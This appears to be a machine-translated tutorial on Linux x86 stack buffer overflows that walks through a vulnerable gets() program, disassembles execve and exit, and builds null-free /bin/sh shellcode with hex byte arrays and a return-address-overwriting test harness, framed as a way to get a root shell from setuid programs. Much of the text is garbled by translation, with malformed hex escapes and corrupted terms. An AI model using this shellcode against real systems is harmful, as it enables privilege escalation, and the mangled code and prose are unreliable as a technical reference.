Although overflow is inevitable in the Process of program development, it poses a huge threat to the system. Due to the particularity of the system, when overflow occurs, attackers can exploit this vulnerability to obtain the system's advanced permissions root. Therefore, this article will introduce the stack overflow technology in detail ...... Before you begin to understand stack overflow, you should first understand the win32 assembly language and the register composition and functions. You must have basic knowledge about stack and storage allocation. There are many computer books related to this. I will simply elaborate on the principles and focus on applications. Next, you should understand linux. In this lecture, our example will be developed on linux.1. First, review the basic knowledge.Physically, a stack is a memory space allocated continuously. Various variables are declared in a program. Static global variables are located in the Data Segment and loaded when the program starts running. Dynamic local variables of the program are allocated to the stack. In terms of operation, the stack is a queue that comes first and then goes out. The growth direction is the opposite to that of memory. We specify that the memory growth direction is up, and the stack growth direction is down. Stack Operation push = ESP-4, the operation is pop = ESP + 4. In other words, the stack in the old value, its memory address, but greater than the new value. Keep this in mind, because this is the basic theoretical basis for Stack Overflow. In the callback function call, the stack will be pushed in sequence: parameters, return address, and EBP. If a function has a local variable, the corresponding space is opened in the stack to construct the variable. When the function execution ends, the content of these local variables will be lost. But not cleared. When the function returns, the EBP is displayed, the stack is restored to the function call address, and the return address to the EIP is displayed to continue executing the program. In C language programs, the parameter pressure stack order is reversed. For example, func (a, B, c ). When the parameter is added to the stack, It is c, B, and. When taking the parameters, because the stack first goes in and then out, take a at the top of the stack, then B, and finally take c. These are the basic knowledge of assembly language. You must understand these knowledge before you begin.2. Now let's see what Stack Overflow is.During running, the stack allocation Stack Overflow means that too much data is written to the data block regardless of the size of the data block in the stack, leading to data out of bounds, and the result overwrites the old stack data. Example 1: # include int main () {char name [8]; printf ("Please type your name:"); gets (name); printf ("Hello, % s! ", Name); return 0;} compile and execute. Input ipxodi to output Hello, ipxodi !. How is the stack operated when the program is running? When the main function starts to run, the stack will be placed in the return address and EBP in sequence. We use gcc-S to obtain assembly language output. We can see that the start part of the main function corresponds to the following statement: pushl % ebp movl % esp, % ebp subl $8, % esp first saves the EBP, and then EBP is equal to the current ESP, so that EBP can be used to access the local variables of this function. After that, ESP minus 8, that is, the stack increases by 8 bytes to store the name [] array. Finally, main returns. The address in ret is displayed and assigned to the EIP. The CPU continues to execute the command pointed to by the EIP. Stack Overflow www.2cto.com now we will execute it again. After ipxodiAAAAAAAAAAAAAAA is input and gets (name) is executed, the name array cannot accommodate because the input name string is too long, you have to write 'A' to the top of the memory '. Because the stack growth direction is opposite to the memory growth direction, these 'A' overwrites the old elements of the stack. We can find that EBP and ret have been overwritten by 'A. When main returns, the 'aaa' ASCII code: 0x4141414141 is used as the return address. The CPU tries to execute the command at 0x41414141 and the result is incorrect. This is a stack overflow. 3. How to Use Stack Overflow we have created a stack overflow. The principle can be summarized as follows: Because the string processing functions (gets, strcpy, and so on) do not monitor and limit the array out-of-bounds, we use the character array to write out-of-bounds and overwrite the value of the old element in the stack, you can modify the return address. In the preceding example, this causes the CPU to access a non-existent command and the result is incorrect. In fact, when the stack overflows, we have completely controlled the next action of this program. If we overwrite the returned address with an actual instruction address, the CPU will execute our instruction instead. In the UINX/linux system, our command can execute a shell, which will obtain the same permissions as the program that is overflows by our stack. If this program is set UID, we can get the root shell. The next section describes how to write a shell code.How to Write a shell codeI. shellcode basic algorithm analysis in a program, a shell program is written as follows: shellcode. c ------------------------------------------------------------------------ # include void main () {char * name [2]; name [0] = "/bin/sh" name [1] = NULL; execve (name [0], name, NULL);} ---------------------------------------------------------------------- the execve function will execute a program. He needs the program name address as the first parameter. A pointer array with content of argv [I] (argv [n-1] = 0) of the program serves as the second parameter, and (char *) 0 serves as the third parameter.Let's take a look at execve's assembly code:[Nkl10] $ Content $ nbsp; gcc-o shellcode-static shellcode. c [nkl10] $ Content $ nbsp; gdb shellcode (gdb) disassemble _ execve Dump of javaser code for function _ execve: 0x80002bc <__ execve>: pushl % ebp; 0x80002bd <__execve + 1>: movl % esp, % ebp; above is the function header. 0x80002bf <__ execve + 3>: pushl % ebx; save ebx 0x80002c0 <__ execve + 4>: movl $ 0xb, % eax; eax = 0xb, eax indicates the number of system calls. 0x80002c5 <__execve + 9>: movl 0x8 (% ebp), % ebx; ebp + 8 is the first parameter "/bin/sh \ 0" 0x80002c8 <__execve + 12>: movl 0xc (% ebp), % ecx; ebp + 12 is the address of the second parameter name array 0x80002cb <__ execve + 15>: movl 0x10 (% ebp), % edx; ebp + 16 is the third parameter NULL pointer address. Name [2-1] is NULL, used to store the return value. 0x80002ce <__execve + 18>: int $0x80; execute 0xb System Call (execve) 0x80002d0 <__ execve + 20>: movl % eax, % edx; the processing of the returned values is useless. 0x80002d2 <__ execve + 22>: testl % edx, % edx 0x80002d4 <__ execve + 24>: jnl 0x80002e6 <__ execve + 42> 0x80002d6 <__ execve + 26>: negl % edx 0x80002d8 <__ execve + 28>: pushl % edx 0x80002d9 <__ execve + 29>: call 0x8001a34 <__ normal_errno_location> 0x80002de <__ execve + 34>: popl % edx 0x80002df <__ execve + 35>: movl % edx, (% eax) 0x80002e1 <__ execve + 37>: movl $0 xffffffff, % eax 0x80002e6 <__ execve + 42>: popl % ebx 0x80002e7 <__ execve + 43>: movl % ebp, % esp 0x80002e9 <__ execve + 45>: popl % ebp 0x80002ea <__ execve + 46>: ret 0x80002eb <__ execve + 47>: nop End of extends er dump.After the above analysis, we can get the following simplified command algorithm:Movl $ execve system call number, % eax movl "bin/sh \ 0" Address, % ebx movl name array address, % ecx movl name [n-1] address, % edx int $0x80; execve: When execve is successfully executed, the program shellcode will exit and/bin/sh will continue to be executed as a sub-process. However, if execve fails to be executed (for example, there is no/bin/sh file), the CPU will continue to execute subsequent commands and the results will not know where to go. Therefore, an exit () system call must be executed to end the execution of shellcode. c.Let's take a look at the compilation code of exit (0:(Gdb) disassemble _ exit Dump of your er code for function _ exit: 0x800034c <_ exit>: pushl % ebp 0x800034d <_ exit + 1>: movl % esp, % ebp 0x800034f: pushl % ebx 0x8000350 <_ exit + 4>: movl $0x1, % eax; 1 System Call 0x8000355 <_ exit + 9>: movl 0x8 (% ebp), % ebx; ebx is 0 0x8000358 <_ exit + 12>: int $0x80; System Call 0x800035a <_ exit + 14>: movl 0 xfffffffc (% ebp), % ebx 0x800035d <_ exit + 17>: movl % ebp, % esp 0x800035f <_ exit + 19 >:popl % ebp 0x8000360 <_ exit + 20>: ret 0x8000361 <_ exit + 21>: nop 0x8000362 <_ exit + 22>: nop 0x8000363 <_ exit + 23>: nop End of orders er dump. it seems that exit (0)] assembly code is simpler: movl $0x1, % eax; 1 system calls movl 0, % ebx; ebx is the exit parameter 0 int $0x80. If the system call is triggered, the merged assembly code is: movl $ execve's system call number, % eax movl "bin/sh \ 0" Address, % ebx movl name array address, % ecx movl name [n-1] address, % edx int $0x80; execve movl $0x1, % eax; 1: The system calls movl 0, % ebx; ebx is the exit parameter 0 int $0x80; execute system call (exit)
2. Implement a shellcode
Okay. Let's implement this algorithm. First, we must have a string "/bin/sh" and a name.
Array. We can construct them, but how do we know their addresses in shellcode? Each time
The program is dynamically loaded, and the address of the string and name array is not fixed.
Through the combination of JMP and call, hackers cleverly solved this problem.
------------------------------------------------------------------------
------
Offset address of jmp call #2 bytes
Popl % esi #1 byte // popl returns the string address.
Movl % esi, array-offset (% esi) #3 bytes // construct the name array at string + 8,
// Name [0] specifies the string address.
Movb $0x0, nullbyteoffset (% esi) #4 bytes // string + 7 place 0 as the string knot
Tail.
Movl $0x0, null-offset (% esi) #7 bytes // name [1] Put 0.
Movl $ 0xb, % eax #5 bytes // eax = 0xb is the execve syscall code
.
Movl % esi, % ebx #2 bytes // address of ebx = string
Leal array-offset, (% esi), % ecx #3 bytes // ecx = start address of the name array
Leal null-offset (% esi), % edx #3 bytes // edx = name [1] address
Int $0x80 #2 bytes // int 0x80 is sys call
Movl $0x1, % eax #5 bytes // eax = 0x1 is the exit syscall code
Movl $0x0, % ebx #5 bytes // ebx = 0 is the return value of exit
Int $0x80 #2 bytes // int 0x80 is sys call
Call popl offset address #5 bytes // put the call here, the string address will
Work
// Press the stack for the returned address.
/Bin/sh string
------------------------------------------------------------------------
------
First, use the relative address of JMP to jump to the call. After the call command is executed, the address of the string/bin/sh will be
The return address of the call is pushed into the stack. Now, go to popl esi and extract the string address that has just been pushed into the stack,
The real address of the string is obtained. Then, 0 is assigned to the first byte of the string as the end of the string. Back
8 bytes to construct the name array (two integers, eight bytes ).
We can write shellcode. Write the Assembly source program first.
Shellcodeasm. c
------------------------------------------------------------------------
------
Void main (){
_ Asm __("
Jmp 0x2a #3 bytes
Popl % esi #1 byte
Movl % esi, 0x8 (% esi) #3 bytes
Movb $0x0 0x7 (% esi) #4 bytes
Movl $0x0, 0xc (% esi) #7 bytes
Movl $ 0xb, % eax #5 bytes
Movl % esi, % ebx #2 bytes
Leal 0x8 (% esi), % ecx #3 bytes
Leal 0xc (% esi), % edx #3 bytes
Int $0x80 #2 bytes
Movl $0x1, % eax #5 bytes
Movl $0x0, % ebx #5 bytes
Int $0x80 #2 bytes
Call-0x2f #5 bytes
. String/"/bin/sh/" #8 bytes
");
}
------------------------------------------------------------------------
------
After compilation, use the gdb B/bx [address] command to obtain the hexadecimal representation.
Below, write the test program as follows: (Note that this test program is the basic program for testing shellcode)
Test. c
------------------------------------------------------------------------
------
Char shellcode [] =
"/Xeb/x2a/x5e/x89/x76/x08/xc6/x46/x07/x00/xc7/x46/x0c/x00/x00/x00"
"/X00/xb8/x0b/x00/x00/x00/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80"
"/Xb8/x01/x00/x00/x00/xbb/x00/x00/x00/x00/xcd/x80/xe8/xd1/xff"
"/Xff/x2f/x62/x69/x6e/x2f/x73/x68/x00/x89/xec/x5d/xc3"
Void main (){
Int * ret;
Ret = (int *) & ret + 2; // ret is equal to the return address of main ()
// (+ 2 is because pushl ebp exists; otherwise, you can add 1 .)
(* Ret) = (int) shellcode; // modify the return address of main () to the beginning of shellcode.
Address.
}
------------------------------------------------------------------------
------
------------------------------------------------------------------------
------
[Nkl10] $ Content $ nbsp; gcc-o test. c
[Nkl10] $ Content $ nbsp;./test
$ Content $ nbsp; exit
[Nkl10] $ Content $ nbsp;
------------------------------------------------------------------------
------
We store the shellcode through a shellcode array. When we put the return address of the Program (test. c)
When ret is set to the starting address of the shellcode array, the program will execute our shellcode when returning,
So we get a shell.
Run the result and get the bsh prompt $, indicating that a shell is successfully opened.
Here it is necessary to explain that we put shellcode as a global variable in the data segment instead
A piece of code. In the operating system, the content of a program code segment has read-only attributes. It cannot be modified.
In our code, movl % esi, 0x8 (% esi) and other statements have modified part of the code, so they cannot be placed in
Code segment.
Is This shellcode okay? Unfortunately, it is a little worse. Let's recall that in stack overflow
The key lies in the overwrite of the string array. However, when string functions such as gets and strcpy process strings,
To "/0"
End with a string. When/0, the write operation is completed. Our shellcode string contains a large number of/0 characters. Therefore,
For gets (name), the shellcode above is not feasible. Our shellcode cannot contain/0 characters
.
Therefore, some commands need to be modified:
Old commands new commands
--------------------------------------------------------
Movb $0x0 0x7 (% esi) xorl % eax, % eax
Molv $0x0, 0xc (% esi) movb % eax, 0x7 (% esi)
Movl % eax, 0xc (% esi)
--------------------------------------------------------
Movl $ 0xb, % eax movb $ 0xb, % al
--------------------------------------------------------
Movl $0x1, % eax xorl % ebx, % ebx
Movl $0x0, % ebx movl % ebx, % eax
Inc % eax
--------------------------------------------------------
The final shellcode is:
------------------------------------------------------------------------
----
Char shellcode [] =
00 "/xeb/x1f"/* jmp 0x1f */
02 "/x5e"/* popl % esi */
03 "/x89/x76/x08"/* movl % esi, 0x8 (% esi )*/
06 "/x31/xc0"/* xorl % eax, % eax */
08 "/x88/x46/x07"/* movb % eax, 0x7 (% esi )*/
0b "/x89/x46/x0c"/* movl % eax, 0xc (% esi )*/
0e "/xb0/x0b"/* movb $ 0xb, % al */
10 "/x89/xf3"/* movl % esi, % ebx */
12 "/x8d/x4e/x08"/* leal 0x8 (% esi), % ecx */
15 "/x8d/x56/x0c"/* leal 0xc (% esi), % edx */
18 "/xcd/x80"/* int $0x80 */
1a "/x31/xdb"/* xorl % ebx, % ebx */
1c "/x89/xd8"/* movl % ebx, % eax */
1e "/x40"/* inc % eax */
1f "/xcd/x80"/* int $0x80 */
21 "/xe8/xdc/xff"/* call-0x24 */
26 "/bin/sh"/*. string/"/bin/sh /"*/